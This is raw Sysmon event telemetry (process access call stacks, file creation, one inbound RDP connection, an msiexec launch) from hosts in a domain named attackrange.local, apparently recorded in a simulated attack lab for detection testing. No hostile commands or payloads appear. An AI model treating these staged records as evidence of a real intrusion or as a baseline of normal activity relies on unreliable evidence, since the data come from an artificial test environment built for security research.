14:58:21.029{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B622-607E-0100-00000000BB01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000079311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.966{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:20.966{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050521Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:19.870{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60382-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050520Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:21.728{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B2A762C80A43B7E5A78EF39A85F46D,SHA256=F634FEE15F7BAB30FE9174B0CB23248FD74CDB85250A1F476F76CE9D3A197E7F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.982{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC0E-607E-390E-00000000BB01}5076C:\Windows\syswow64\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.966{A7A01FEF-C0A3-607E-6C05-00000000BB01}36244292C:\Windows\system32\csrss.exe{A7A01FEF-EC0E-607E-390E-00000000BB01}5076C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x800000000000000079379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.904{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FACCD5CBF85E35968DD781F7DD3E7F18,SHA256=7165453B89F4E09BD1CEBD34A947DCAE3C116A44E472BD441581F2E645939EED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.810{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.810{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.810{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.810{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.810{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC0E-607E-390E-00000000BB01}5076C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.810{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14004552C:\Windows\system32\msiexec.exe{A7A01FEF-EC0E-607E-390E-00000000BB01}5076C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ba4f5|C:\Windows\system32\Msi.dll+16c3b4|C:\Windows\system32\Msi.dll+16ca2c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000079372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.814{A7A01FEF-EC0E-607E-390E-00000000BB01}5076C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FC8FF24FD8BD22E0CF52679A365E5F2AC:\Windows\SysWOW64\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 23542300x800000000000000079371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.779{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d0829c.rbsMD5=EC06DA408D11C1A79AD30530EA3C1E3C,SHA256=B1575E789E0075695DAD8EDC05B05082FD1D5358C7030E45C670033456DDFA9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.748{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF8CAE77F3ABDA8999.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.732{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFB96D0A296AD1D125.TMPMD5=AB035B03D03A400106A9F82DDF126767,SHA256=DEFF6E16FBF4497DCEDB79CAEFA0C70F53C93605505C45747A739420CD93F582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.732{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF6EF82E84C77246E3.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.685{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF25E635979581F25A.TMPMD5=AB035B03D03A400106A9F82DDF126767,SHA256=DEFF6E16FBF4497DCEDB79CAEFA0C70F53C93605505C45747A739420CD93F582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.623{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI9B1F.tmpMD5=A61BD7CAC032DFA1C0808FC77754E7E0,SHA256=330E74C0AE0B0CA9E27209EF8BCFD6662FD90A737C8B0ED0818281F5BC6E6949,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.576{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5342e|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+e240d|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5132|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.576{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+53398|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+e240d|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5132|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.576{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+e240d|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5132|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.576{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+e240d|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5132|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.576{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+d15ba|C:\Windows\System32\SHELL32.dll+84a34|C:\Windows\System32\SHELL32.dll+84688|C:\Windows\SYSTEM32\msi.dll+e240d|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5132|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.576{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d15a8|C:\Windows\System32\SHELL32.dll+84a34|C:\Windows\System32\SHELL32.dll+84688|C:\Windows\SYSTEM32\msi.dll+e240d|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5132|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000079359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.576{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d15a8|C:\Windows\System32\SHELL32.dll+84a34|C:\Windows\System32\SHELL32.dll+84688|C:\Windows\SYSTEM32\msi.dll+e240d|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5132|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.544{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT 